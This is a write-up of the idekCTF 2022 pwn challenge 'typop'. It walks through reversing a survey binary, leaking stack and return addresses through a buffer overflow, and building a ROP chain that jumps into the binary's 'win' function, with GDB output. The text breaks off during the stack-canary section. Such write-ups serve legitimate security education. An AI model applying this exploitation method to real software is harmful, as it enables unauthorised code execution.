IdekCTF 2022 - typop: A Joyful ROP

I finally have time to start participating in CTFs again, so I decided to kick 2023 off with idekCTF 2022 this last weekend. While I usually focus more on web and misc challenges, I decided to dedicate the last day of the CTF to focusing on pwn challenges. This write-up is about a pwn challenge called typop by JW#9396.

The Challenge

Typop is a binary exploitation challenge (pwn) where you have to connect to a remote service and attempt to utilize the ability to interact with a running program to trigger a remote code exploit.

The challenge starts out with the following prompt:

While writing the feedback form for idekCTF, JW made a small typo. It still compiled though, so what could possibly go wrong?

A command is provided for connecting to the program using netcat:

nc typop.chal.idek.team 1337

Connecting to it we see that it's a simple program that runs in a loop and asks for survey feedback with a couple of prompts:

$ nc typop.chal.idek.team 1337
== proof-of-work: disabled ==
Do you want to complete a survey?
y
Do you like ctf?
maybe
You said: maybe

Aww :( Can you provide some extra feedback?
no
Do you want to complete a survey?
y
Do you like ctf?
yeah sure
You said: yeah sure

That's great! Can you provide some extra feedback?
no
Do you want to complete a survey?
no

An attachment called typop.tar was provided with the following files:

$ tar xvf typop.tar
attachments/
attachments/chall
attachments/Dockerfile
attachments/flag.txt
$ ls -l attachments/
total 28
-rwxr-xr-x. 1 james james 17160 Jan 13 14:54 chall
-rwxr-xr-x. 1 james james   155 Jan 13 14:54 Dockerfile
-rwxr-xr-x. 1 james james    16 Jan 13 14:54 flag.txt

Dockerfile and flag.txt are included to show how the remote service has been set up and configured. The file chall contains a copy of the file running on the remote server so we can analyze it and test our exploit locally first. This file is a standard amd64 Linux ELF binary with a number of protections enabled:

$ file attachments/chall
attachments/chall: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV),
dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2,
BuildID[sha1]=47348e907e6bd456810c6015278d5e43110c8318, for GNU/Linux 3.2.0, not
stripped
$ pwn checksec attachments/chall
[*] '/home/james/src/idekctf-typop/attachments/chall'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

With all of these details in mind, we can start analyzing the binary.

Analyzing the Binary

Ghidra is a software reverse engineering (SRE) suite of tools developed by NSA's Research Directorate in support of the Cybersecurity mission. It's a great open source tool one can use to try and safely determine what a binary does. We'll be using the decompiler feature to look at the various functions in our binary.

Note: I've included my own conceptual reconstruction of typop.c here for reference.

Creating a new project and loading the binary into Ghidra, we can auto analyze it and have it decompile all of the code. From there, the entry point (in this case, main) is a good place to start understanding the code:

undefined8 main(void)
{
  int iVar1;
  
  setvbuf(stdout,(char *)0x0,2,0);
  while( true ) {
    iVar1 = puts("Do you want to complete a survey?");
    if (iVar1 == 0) {
      return 0;
    }
    iVar1 = getchar();
    if (iVar1 != 0x79) break;
    getchar();
    getFeedback();
  }
  return 0;
}

If we clean this up a bit, we can imagine the original code looking like this:

int main(void)
{
  int res;
  while (true) {
    res = puts("Do you want to complete a survey?");
    if (res == 0) {
      return 0;
    }
    res = getchar();
    if (res != 'y') break;
    getchar();
    getFeedback();
  }
  return 0;
}

Now we can take a look at getFeedback(). Ghidra gives us this:

void getFeedback(void)

{
  long in_FS_OFFSET;
  undefined8 local_1a;
  undefined2 local_12;
  long local_10;
  
  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  local_1a = 0;
  local_12 = 0;
  puts("Do you like ctf?");
  read(0,&local_1a,0x1e);
  printf("You said: %s\n",&local_1a);
  if ((char)local_1a == 'y') {
    printf("That\'s great! ");
  }
  else {
    printf("Aww :( ");
  }
  puts("Can you provide some extra feedback?");
  read(0,&local_1a,0x5a);
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return;
}

The in_FS_OFFSET bits are from Ghidra trying to represent the canary based stack protection added to the binary by the compiler. Unfortunately, Ghidra won't always be able to represent the things it decompiles accurately. Similarly, Ghidra doesn't reverse arrays back into single variables in its decompiled code. With that in mind, we can imagine the original code looking more like this:

void getFeedback()
{
  char buf[10] = {0};
  puts("Do you like ctf?");
  read(STDIN_FILENO, buf, 30);
  printf("You said: %s\n", buf);
  if (buf[0] == 'y') {
    printf("That\'s great! ");
  }
  else {
    printf("Aww :( ");
  }
  puts("Can you provide some extra feedback?");
  read(STDIN_FILENO, buf, 90);
}

There are some important take-aways from this code:

We use a local array buf and read more data into it than it can hold. This means we can overflow a buffer on the stack and write any stack values we want.
We use the read function to store the user input, which means we aren't restricted in what byte values the user can store (many other functions will stop reading when they see certain values such as NUL bytes or line endings).
We print out the contents of buf after we corrupt it, allowing us to leak existing data from the stack.

Additionally, amongst the handful of functions we see something called win:

void win(undefined param_1,undefined param_2,undefined param_3)

{
  FILE *__stream;
  long in_FS_OFFSET;
  undefined8 local_52;
  undefined2 local_4a;
  undefined8 local_48;
  undefined8 local_40;
  undefined8 local_38;
  undefined8 local_30;
  undefined8 local_28;
  undefined8 local_20;
  long local_10;
  
  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  local_4a = 0;
  local_52 = CONCAT17(0x74,CONCAT16(0x78,CONCAT15(0x74,CONCAT14(0x2e,CONCAT13(0x67,CONCAT12(param_3,
                                                  CONCAT11(param_2,param_1)))))));
  __stream = fopen((char *)&local_52,"r");
  if (__stream == (FILE *)0x0) {
    puts("Error opening flag file.");
                    /* WARNING: Subroutine does not return */
    exit(1);
  }
  local_48 = 0;
  local_40 = 0;
  local_38 = 0;
  local_30 = 0;
  local_28 = 0;
  local_20 = 0;
  fgets((char *)&local_48,0x20,__stream);
  puts((char *)&local_48);
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return;
}

Cleaning this up gives us something like the following:

void win(char c1, char c2, char c3)
{
  FILE *f;
  int res;
  char buf[48] = {0};
  char filename[10] = {c1, c2, c3, 'g', '.', 't', 'x', 't', '\0'};
  f = fopen(filename, "r");
  if (f == NULL) {
    puts("Error opening flag file.");
    exit(1);
  }
  fgets(buf, 32, f);
  puts(buf);
}

The binary already includes a function we can call as win('f', 'l', 'a') to open the file flag.txt in the current directory and print it out. The Dockerfile shows us that this is exactly what we need to win:


FROM pwn.red/jail
COPY --from=ubuntu:20.04 / /srv
RUN mkdir /srv/app
ADD chall /srv/app/run
ADD flag.txt /srv/app/flag.txt
RUN chmod +x /srv/app/run

Of course, at this point, we know we can overflow a buffer on the stack. What's stopping us from just injecting and executing some code? Why not just spawn a shell and do whatever we want?

Unfortunately, this binary has NX enabled (no-execute). Linux implements a form of nonexecutable stack that this binary takes advantage of to protect against code being placed into to stack and executed from it:

$ pwn checksec attachments/chall
[*] '/home/james/src/idekctf-typop/attachments/chall'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

Despite this and other protections, we can still use a technique called return-oriented programming (ROP) to take advantage of the buffer overflow and get the flag.

Return-Oriented Programming

Normally buffer overflows are exploited in "stack smashing" attacks by overwriting the stack with a carefully crafted payload that includes a return address to the payload's location on the stack and a sequence of machine code instructions to execute.

Unfortunately, in our case, the NX stack protection prevents any shellcode written to the stack from ever executing.

To overcome this form of protection, a different form of stack smashing attack has become popular. Instead of storing code in the stack, it relies on existing code already within the binary.

If we look carefully at the machine code present within a binary, we can often find sequences of code that do useful operations followed by a ret opcode. ret is great because it pops whatever is on the stack onto the instruction pointer and jumps to that location to continue execution.

We call these useful sequences of code "gadgets", and we can easily craft a sequence of instruction pointers on the stack to these gadgets that will call them in a specific sequence.

Because this form of exploit leverages the existence of ret instructions in the code to control the execution, it is called Return-Oriented Programming (ROP).

Applying ROP to "win"

To utilize ROP, we need some function or code that we want to execute that already exists in the binary. We already discovered a very useful win function in the analysis stage.

Unfortunately, our binary was built as a Position-Independent Executable (PIE):

$ pwn checksec attachments/chall
[*] '/home/james/src/idekctf-typop/attachments/chall'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

Linux will use this feature of the binary to enable a technique called Address Space Layout Randomization (ASLR). With ASLR, Linux will loads the binary's code starting at different addresses every time the program runs. This means that any addresses we determine from one execution will be useless for the next one.

We can verify this by checking the address of win across multiple runs (note that we have to turn off a gdb feature that disables ASLR when debugging):

(gdb) set disable-randomization off
(gdb) break main
Breakpoint 1 at 0x1418
(gdb) run
Starting program: /home/james/src/idekctf-typop/attachments/chall
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib64/libthread_db.so.1".

Breakpoint 1, 0x0000564d96503418 in main ()
(gdb) print win
$2 = {<text variable, no debug info>} 0x564d96503249 <win>
(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/james/src/idekctf-typop/attachments/chall
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib64/libthread_db.so.1".

Breakpoint 1, 0x00005566e9de0418 in main ()
(gdb) print win
$3 = {<text variable, no debug info>} 0x5566e9de0249 <win>
(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/james/src/idekctf-typop/attachments/chall
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib64/libthread_db.so.1".

Breakpoint 1, 0x0000556227548418 in main ()
(gdb) print win
$4 = {<text variable, no debug info>} 0x556227548249 <win>
(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/james/src/idekctf-typop/attachments/chall
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib64/libthread_db.so.1".

Breakpoint 1, 0x0000557781cc6418 in main ()
(gdb) print win
$5 = {<text variable, no debug info>} 0x557781cc6249 <win>

Getting Based

The good news is that because the code we want to run (win) and the code we have an address for (main) are in the same segment always have the same relative locations to each other.

In addition, if we look carefully at getFeedback, we notice that we have an opportunity to leak the return address from the stack with the first overflow:

void getFeedback()
{
  char buf[10] = {0};
  puts("Do you like ctf?");
  read(STDIN_FILENO, buf, 30);
  printf("You said: %s\n", buf);
  if (buf[0] == 'y') {
    printf("That\'s great! ");
  }
  else {
    printf("Aww :( ");
  }
  puts("Can you provide some extra feedback?");
  read(STDIN_FILENO, buf, 90);
}

The call to printf will keep printing until it finds a NUL byte (0x00 in memory). This allows us to leak arbitrarily large amounts of stack data up to what we can control with the buffer overflow. This includes the address of the previous stack frame and the return address to main.

We can easily figure out ahead of time what the relative offset is between this return address and the win function by running the code in GDB:

(gdb) break getFeedback
Breakpoint 1 at 0x55c92b269350
(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/james/src/idekctf-typop/attachments/chall
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib64/libthread_db.so.1".
Do you want to complete a survey?
y

Breakpoint 1, 0x0000562fb377d350 in getFeedback ()
(gdb) x/2gx $rsp
0x7ffce2f1e370: 0x00007ffce2f1e380      0x0000562fb377d447
(gdb) print win
$5 = {<text variable, no debug info>} 0x562fb377d249 <win>
(gdb) print 0x0000562fb377d447 - 0x562fb377d249
$6 = 510
(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/james/src/idekctf-typop/attachments/chall
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib64/libthread_db.so.1".
Do you want to complete a survey?
y

Breakpoint 1, 0x0000559e1a7f1350 in getFeedback ()
(gdb) x/2gx $rsp
0x7ffc24b82480: 0x00007ffc24b82490      0x0000559e1a7f1447
(gdb) print win
$7 = {<text variable, no debug info>} 0x559e1a7f1249 <win>
(gdb) print 0x0000559e1a7f1447 - 0x559e1a7f1249
$8 = 510

You can also disassemble the code to figure out the offset without running anything. Compare the relative offset of the instruction in main right after call getFeedback to the relative address of win:

$ gdb ./chall
Reading symbols from ./chall...
(No debugging symbols found in ./chall)
(gdb) print win
$1 = {<text variable, no debug info>} 0x1249 <win>
(gdb) disassemble main
Dump of assembler code for function main:
   0x0000000000001410 <+0>:     endbr64
   0x0000000000001414 <+4>:     push   %rbp
   0x0000000000001415 <+5>:     mov    %rsp,%rbp
   0x0000000000001418 <+8>:     mov    0x2bf1(%rip),%rax        # 0x4010 <stdout@@GLIBC_2.2.5>
   0x000000000000141f <+15>:    mov    $0x0,%ecx
   0x0000000000001424 <+20>:    mov    $0x2,%edx
   0x0000000000001429 <+25>:    mov    $0x0,%esi
   0x000000000000142e <+30>:    mov    %rax,%rdi
   0x0000000000001431 <+33>:    call   0x1130 <setvbuf@plt>
   0x0000000000001436 <+38>:    jmp    0x1447 <main+55>
   0x0000000000001438 <+40>:    call   0x1120 <getchar@plt>
   0x000000000000143d <+45>:    mov    $0x0,%eax
   0x0000000000001442 <+50>:    call   0x1348 <getFeedback>
   0x0000000000001447 <+55>:    lea    0xc3a(%rip),%rdi        # 0x2088
   0x000000000000144e <+62>:    call   0x10d0 <puts@plt>
   0x0000000000001453 <+67>:    test   %eax,%eax
   0x0000000000001455 <+69>:    je     0x1461 <main+81>
   0x0000000000001457 <+71>:    call   0x1120 <getchar@plt>
   0x000000000000145c <+76>:    cmp    $0x79,%eax
   0x000000000000145f <+79>:    je     0x1438 <main+40>
   0x0000000000001461 <+81>:    mov    $0x0,%eax
   0x0000000000001466 <+86>:    pop    %rbp
   0x0000000000001467 <+87>:    ret
End of assembler dump.
(gdb) print 0x1447 - 0x1249
$2 = 510

Once we manage to leak the return address, no matter what it is, we can subtract 510 from it to get the address we need to call win.

Winning Arguments

Now that we have an idea of what address to call, we need to figure out how to set the arguments for win. Remember that it takes three values, and that we want to set them to 'f', 'l', and 'a' respectively.

The way we specify the arguments for a function call is defined by something called an Application Binary Interface (ABI). On amd64 Linux, this is specified by a standard known as the System V ABI which you can find and read as a PDF.

On amd64 Linux, this specification says that the first 6 function parameters will be passed using the registers rdi, rsi, rdx, rcx, r8, r9 respectively. This means we need a way to set rdi, rsi, and rdx without being able to inject and run our own machine code.

All we have is the ability to place addresses on the stack. This let's us return to function calls, but we can't set any registers this way. How can we call functions with arguments?

Go Go Gadget to the Rescue

To manipulate registers, we want to find code we can jump to that moves values from the stack to the desired registers and then returns as soon as possible. Code following this pattern is often called "ROP Gadgets" and a variety of tools are designed to find them.

Let's use the Python pwntools library to search for some ROP gadgets to set rdi, rsi, and rdx within our binary:

$ python
>>> import pwn
>>> elf = pwn.ELF("./chall")
[*] '/home/james/src/idekctf-typop/attachments/chall'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
>>> rop = pwn.ROP(elf)
[*] Loading gadgets for '/home/james/src/idekctf-typop/attachments/chall'
>>> rop.rdi
Gadget(0x14d3, ['pop rdi', 'ret'], ['rdi'], 0x8)
>>> rop.rsi
Gadget(0x14d1, ['pop rsi', 'pop r15', 'ret'], ['rsi', 'r15'], 0xc)
>>> rop.rdx
>>> # Uh oh

We run into a problem here because there's no obvious gadget for setting our third argument, rdx.

Missing Gadget Workaround

We can't set the third argument to call win directly, so what do we do? Let's look at the important parts of win:

void win(char c1, char c2, char c3)
{
  FILE *f;
  int res;
  char buf[40] = {0};
  char filename[10] = {c1, c2, c3, 'g', '.', 't', 'x', 't', '\0'};
  f = fopen(filename, "r");
  if (f == NULL) {
    puts("Error opening flag file.");
    exit(1);
  }
  fgets(buf, 32, f);
  puts(buf);
}

None of the operations we care about have dependencies on the previous code aside from the filename. If we can get the correct filename into the fopen code, we can skip setting any other arguments completely. Let's look at this in assembly to get a better idea of what's happening:

(gdb) disas win
Dump of assembler code for function win:
   0x0000000000001249 <+0>:	endbr64 
   0x000000000000124d <+4>:	push   %rbp
   0x000000000000124e <+5>:	mov    %rsp,%rbp
   0x0000000000001251 <+8>:	sub    $0x70,%rsp
   0x0000000000001255 <+12>:	mov    %esi,%ecx
   0x0000000000001257 <+14>:	mov    %edx,%eax
   0x0000000000001259 <+16>:	mov    %edi,%edx
   0x000000000000125b <+18>:	mov    %dl,-0x64(%rbp)
   0x000000000000125e <+21>:	mov    %ecx,%edx
   0x0000000000001260 <+23>:	mov    %dl,-0x68(%rbp)
   0x0000000000001263 <+26>:	mov    %al,-0x6c(%rbp)
   0x0000000000001266 <+29>:	mov    %fs:0x28,%rax
   0x000000000000126f <+38>:	mov    %rax,-0x8(%rbp)
   0x0000000000001273 <+42>:	xor    %eax,%eax
   0x0000000000001275 <+44>:	movq   $0x0,-0x4a(%rbp)
   0x000000000000127d <+52>:	movw   $0x0,-0x42(%rbp)
   0x0000000000001283 <+58>:	movzbl -0x64(%rbp),%eax
   0x0000000000001287 <+62>:	mov    %al,-0x4a(%rbp)
   0x000000000000128a <+65>:	movzbl -0x68(%rbp),%eax
   0x000000000000128e <+69>:	mov    %al,-0x49(%rbp)
   0x0000000000001291 <+72>:	movzbl -0x6c(%rbp),%eax
   0x0000000000001295 <+76>:	mov    %al,-0x48(%rbp)
   0x0000000000001298 <+79>:	movb   $0x67,-0x47(%rbp)
   0x000000000000129c <+83>:	movb   $0x2e,-0x46(%rbp)
   0x00000000000012a0 <+87>:	movb   $0x74,-0x45(%rbp)
   0x00000000000012a4 <+91>:	movb   $0x78,-0x44(%rbp)
   0x00000000000012a8 <+95>:	movb   $0x74,-0x43(%rbp)
   0x00000000000012ac <+99>:	lea    -0x4a(%rbp),%rax
   0x00000000000012b0 <+103>:	lea    0xd51(%rip),%rsi        # 0x2008
   0x00000000000012b7 <+110>:	mov    %rax,%rdi
   0x00000000000012ba <+113>:	call   0x1140 <fopen@plt>
   0x00000000000012bf <+118>:	mov    %rax,-0x58(%rbp)
   0x00000000000012c3 <+122>:	cmpq   $0x0,-0x58(%rbp)
   0x00000000000012c8 <+127>:	jne    0x12e0 <win+151>
   0x00000000000012ca <+129>:	lea    0xd39(%rip),%rdi        # 0x200a
   0x00000000000012d1 <+136>:	call   0x10d0 <puts@plt>
   0x00000000000012d6 <+141>:	mov    $0x1,%edi
   0x00000000000012db <+146>:	call   0x1150 <exit@plt>
   0x00000000000012e0 <+151>:	movq   $0x0,-0x40(%rbp)
   0x00000000000012e8 <+159>:	movq   $0x0,-0x38(%rbp)
   0x00000000000012f0 <+167>:	movq   $0x0,-0x30(%rbp)
   0x00000000000012f8 <+175>:	movq   $0x0,-0x28(%rbp)
   0x0000000000001300 <+183>:	movq   $0x0,-0x20(%rbp)
   0x0000000000001308 <+191>:	movq   $0x0,-0x18(%rbp)
   0x0000000000001310 <+199>:	mov    -0x58(%rbp),%rdx
   0x0000000000001314 <+203>:	lea    -0x40(%rbp),%rax
   0x0000000000001318 <+207>:	mov    $0x20,%esi
   0x000000000000131d <+212>:	mov    %rax,%rdi
   0x0000000000001320 <+215>:	call   0x1110 <fgets@plt>
   0x0000000000001325 <+220>:	lea    -0x40(%rbp),%rax
   0x0000000000001329 <+224>:	mov    %rax,%rdi
   0x000000000000132c <+227>:	call   0x10d0 <puts@plt>
   0x0000000000001331 <+232>:	nop
   0x0000000000001332 <+233>:	mov    -0x8(%rbp),%rax
   0x0000000000001336 <+237>:	xor    %fs:0x28,%rax
   0x000000000000133f <+246>:	je     0x1346 <win+253>
   0x0000000000001341 <+248>:	call   0x10e0 <__stack_chk_fail@plt>
   0x0000000000001346 <+253>:	leave  
   0x0000000000001347 <+254>:	ret    
End of assembler dump.

Pay attention to the way the existing code sets up the call to fopen and then displays the contents. If we can set up a stack frame with "flags.txt\0" at -0x4a from %rbp, then the rest of this code will do what we need without having to set any registers. All we have to do is jump to win+99 instead of calling win directly.

A quick search for ROP gadgets that modify %rbp gives us something useful:

$ python
>>> import pwn
>>> elf = pwn.ELF("./chall")
[*] '/home/james/src/idekctf-typop/attachments/chall'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
>>> rop = pwn.ROP(elf)
[*] Loading gadgets for '/home/james/src/idekctf-typop/attachments/chall'
>>> rop.rbp
Gadget(0x1233, ['pop rbp', 'ret'], ['rbp'], 0x8)

Some more debugger math determines the offset we need to add to the return address we can leak from getFeedback:

(gdb) disassemble main
Dump of assembler code for function main:
   0x0000000000001410 <+0>:	endbr64 
   0x0000000000001414 <+4>:	push   %rbp
   0x0000000000001415 <+5>:	mov    %rsp,%rbp
   0x0000000000001418 <+8>:	mov    0x2bf1(%rip),%rax        # 0x4010 <stdout@@GLIBC_2.2.5>
   0x000000000000141f <+15>:	mov    $0x0,%ecx
   0x0000000000001424 <+20>:	mov    $0x2,%edx
   0x0000000000001429 <+25>:	mov    $0x0,%esi
   0x000000000000142e <+30>:	mov    %rax,%rdi
   0x0000000000001431 <+33>:	call   0x1130 <setvbuf@plt>
   0x0000000000001436 <+38>:	jmp    0x1447 <main+55>
   0x0000000000001438 <+40>:	call   0x1120 <getchar@plt>
   0x000000000000143d <+45>:	mov    $0x0,%eax
   0x0000000000001442 <+50>:	call   0x1348 <getFeedback>
   0x0000000000001447 <+55>:	lea    0xc3a(%rip),%rdi        # 0x2088
   0x000000000000144e <+62>:	call   0x10d0 <puts@plt>
   0x0000000000001453 <+67>:	test   %eax,%eax
   0x0000000000001455 <+69>:	je     0x1461 <main+81>
   0x0000000000001457 <+71>:	call   0x1120 <getchar@plt>
   0x000000000000145c <+76>:	cmp    $0x79,%eax
   0x000000000000145f <+79>:	je     0x1438 <main+40>
   0x0000000000001461 <+81>:	mov    $0x0,%eax
   0x0000000000001466 <+86>:	pop    %rbp
   0x0000000000001467 <+87>:	ret    
End of assembler dump.
(gdb) print main+55
$2 = (<text variable, no debug info> *) 0x1447 <main+55>
(gdb) print win+99
$3 = (<text variable, no debug info> *) 0x12ac <win+99>
(gdb) print 0x1447 - 0x12ac
$4 = 411
(gdb) print 0x1447 - 0x1233
$5 = 532

Once we leak the stack address and return address, we can construct the following ROP chain (note that I'm following GDB's convention of increasing addresses downwards):

stack_address
return_address - 532
stack_address + 16 + 0x4a
return_address - 411
"flag.txt\0"

We have to set rbp to the stack_address we originally return to, plus 0x4a so the code in win will see the "flag.txt" string we place on the stack, plus an extra offset of 16 to account for the stack operations after we return from getFeedback.

Before we continue, we can test out our idea in GDB to check our numbers:

$ gdb --args ./chall
Reading symbols from ./chall...
(No debugging symbols found in ./chall)
(gdb) disas getFeedback
Dump of assembler code for function getFeedback:
   0x0000000000001348 <+0>:	endbr64 
   0x000000000000134c <+4>:	push   %rbp
   0x000000000000134d <+5>:	mov    %rsp,%rbp
   0x0000000000001350 <+8>:	sub    $0x20,%rsp
   0x0000000000001354 <+12>:	mov    %fs:0x28,%rax
   0x000000000000135d <+21>:	mov    %rax,-0x8(%rbp)
   0x0000000000001361 <+25>:	xor    %eax,%eax
   0x0000000000001363 <+27>:	movq   $0x0,-0x12(%rbp)
   0x000000000000136b <+35>:	movw   $0x0,-0xa(%rbp)
   0x0000000000001371 <+41>:	lea    0xcab(%rip),%rdi        # 0x2023
   0x0000000000001378 <+48>:	call   0x10d0 <puts@plt>
   0x000000000000137d <+53>:	lea    -0x12(%rbp),%rax
   0x0000000000001381 <+57>:	mov    $0x1e,%edx
   0x0000000000001386 <+62>:	mov    %rax,%rsi
   0x0000000000001389 <+65>:	mov    $0x0,%edi
   0x000000000000138e <+70>:	call   0x1100 <read@plt>
   0x0000000000001393 <+75>:	lea    -0x12(%rbp),%rax
   0x0000000000001397 <+79>:	mov    %rax,%rsi
   0x000000000000139a <+82>:	lea    0xc93(%rip),%rdi        # 0x2034
   0x00000000000013a1 <+89>:	mov    $0x0,%eax
   0x00000000000013a6 <+94>:	call   0x10f0 <printf@plt>
   0x00000000000013ab <+99>:	movzbl -0x12(%rbp),%eax
   0x00000000000013af <+103>:	cmp    $0x79,%al
   0x00000000000013b1 <+105>:	jne    0x13c6 <getFeedback+126>
   0x00000000000013b3 <+107>:	lea    0xc88(%rip),%rdi        # 0x2042
   0x00000000000013ba <+114>:	mov    $0x0,%eax
   0x00000000000013bf <+119>:	call   0x10f0 <printf@plt>
   0x00000000000013c4 <+124>:	jmp    0x13d7 <getFeedback+143>
   0x00000000000013c6 <+126>:	lea    0xc84(%rip),%rdi        # 0x2051
   0x00000000000013cd <+133>:	mov    $0x0,%eax
   0x00000000000013d2 <+138>:	call   0x10f0 <printf@plt>
   0x00000000000013d7 <+143>:	lea    0xc82(%rip),%rdi        # 0x2060
   0x00000000000013de <+150>:	call   0x10d0 <puts@plt>
   0x00000000000013e3 <+155>:	lea    -0x12(%rbp),%rax
   0x00000000000013e7 <+159>:	mov    $0x5a,%edx
   0x00000000000013ec <+164>:	mov    %rax,%rsi
   0x00000000000013ef <+167>:	mov    $0x0,%edi
   0x00000000000013f4 <+172>:	call   0x1100 <read@plt>
   0x00000000000013f9 <+177>:	nop
   0x00000000000013fa <+178>:	mov    -0x8(%rbp),%rax
   0x00000000000013fe <+182>:	xor    %fs:0x28,%rax
   0x0000000000001407 <+191>:	je     0x140e <getFeedback+198>
   0x0000000000001409 <+193>:	call   0x10e0 <__stack_chk_fail@plt>
   0x000000000000140e <+198>:	leave  
   0x000000000000140f <+199>:	ret    
End of assembler dump.
(gdb) break *getFeedback+177
Breakpoint 1 at 0x13f9
(gdb) run
Starting program: /home/james/src/idekctf-2022-typop/attachments/chall 
Do you want to complete a survey?
y
Do you like ctf?
y
You said: y

That's great! Can you provide some extra feedback?
y

Breakpoint 1, 0x0000561a105aa3f9 in getFeedback ()
(gdb) x/2gx $rbp
0x7ffe664a6d50:	0x00007ffe664a6d60	0x0000561a105aa447
(gdb) set $stack_address = *(long *)$rbp
(gdb) set $return_address = *(long *)($rbp + 8)
(gdb) set {long}($rbp+8) = ($return_address - 532)
(gdb) set {long}($rbp+16) = ($stack_address + 0x4a + 16)
(gdb) set {long}($rbp+24) = ($return_address - 411)
(gdb) x/4gx $rbp
0x7ffe664a6d50:	0x00007ffe664a6d60	0x0000561a105aa233
0x7ffe664a6d60:	0x00007ffe664a6dba	0x0000561a105aa2ac
(gdb) set {char[9]}($rbp+32) = "flag.txt"
(gdb) x/9c $rbp+32
0x7ffe664a6d70:	102 'f'	108 'l'	97 'a'	103 'g'	46 '.'	116 't'	120 'x'	116 't'
0x7ffe664a6d78:	0 '\000'
(gdb) break *win+99
Breakpoint 2 at 0x561a105aa2ac
(gdb) c
Continuing.

Breakpoint 2, 0x0000561a105aa2ac in win ()
(gdb) x/9c $rsp
0x7ffe664a6d70:	102 'f'	108 'l'	97 'a'	103 'g'	46 '.'	116 't'	120 'x'	116 't'
0x7ffe664a6d78:	0 '\000'
(gdb) x/9c $rbp-0x4a
0x7ffe664a6d70:	102 'f'	108 'l'	97 'a'	103 'g'	46 '.'	116 't'	120 'x'	116 't'
0x7ffe664a6d78:	0 '\000'
(gdb) break fopen
Breakpoint 3 at 0x7fe35b32ec80: file iofopen.c, line 86.
(gdb) c
Continuing.

Breakpoint 3, _IO_new_fopen (filename=0x7ffe664a6d70 "flag.txt", 
    mode=0x561a105ab008 "r") at iofopen.c:86
86	iofopen.c: No such file or directory.
(gdb) c
Continuing.
idek{REDACTED}

*** stack smashing detected ***: terminated

Program received signal SIGABRT, Aborted.
__GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50
50	../sysdeps/unix/sysv/linux/raise.c: No such file or directory.

Keeping the Canary Alive

The final obstacle stopping us from taking advantage of our buffer overflow is the presence of a stack protection mechanism called stack canaries:

$ pwn checksec attachments/chall
[*] '/home/james/src/idekctf-typop/attachments/chall'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

This leads us back to the funny code Ghidra generated because it couldn't understand the code added by the compiler for this feature. We can make more sense of it by looking at the assembly instructions instead:

(gdb) disas getFeedback
Dump of assembler code for function getFeedback:
   0x0000000000001348 <+0>:	endbr64 
   0x000000000000134c <+4>:	push   %rbp
   0x000000000000134d <+5>:	mov    %rsp,%rbp
   0x0000000000001350 <+8>:	sub    $0x20,%rsp
   0x0000000000001354 <+12>:	mov    %fs:0x28,%rax
   0x000000000000135d <+21>:	mov    %rax,-0x8(%rbp)
   0x0000000000001361 <+25>:	xor    %eax,%eax
   0x0000000000001363 <+27>:	movq   $0x0,-0x12(%rbp)
   0x000000000000136b <+35>:	movw   $0x0,-0xa(%rbp)
   0x0000000000001371 <+41>:	lea    0xcab(%rip),%rdi        # 0x2023
   0x0000000000001378 <+48>:	call   0x10d0 <puts@plt>
   0x000000000000137d <+53>:	lea    -0x12(%rbp),%rax
   0x0000000000001381 <+57>:	mov    $0x1e,%edx
   0x0000000000001386 <+62>:	mov    %rax,%rsi
   0x0000000000001389 <+65>:	mov    $0x0,%edi
   0x000000000000138e <+70>:	call   0x1100 <read@plt>
   0x0000000000001393 <+75>:	lea    -0x12(%rbp),%rax
   0x0000000000001397 <+79>:	mov    %rax,%rsi
   0x000000000000139a <+82>:	lea    0xc93(%rip),%rdi        # 0x2034
   0x00000000000013a1 <+89>:	mov    $0x0,%eax
   0x00000000000013a6 <+94>:	call   0x10f0 <printf@plt>
   0x00000000000013ab <+99>:	movzbl -0x12(%rbp),%eax
   0x00000000000013af <+103>:	cmp    $0x79,%al
   0x00000000000013b1 <+105>:	jne    0x13c6 <getFeedback+126>
   0x00000000000013b3 <+107>:	lea    0xc88(%rip),%rdi        # 0x2042
   0x00000000000013ba <+114>:	mov    $0x0,%eax
   0x00000000000013bf <+119>:	call   0x10f0 <printf@plt>
   0x00000000000013c4 <+124>:	jmp    0x13d7 <getFeedback+143>
   0x00000000000013c6 <+126>:	lea    0xc84(%rip),%rdi        # 0x2051
   0x00000000000013cd <+133>:	mov    $0x0,%eax
   0x00000000000013d2 <+138>:	call   0x10f0 <printf@plt>
   0x00000000000013d7 <+143>:	lea    0xc82(%rip),%rdi        # 0x2060
   0x00000000000013de <+150>:	call   0x10d0 <puts@plt>
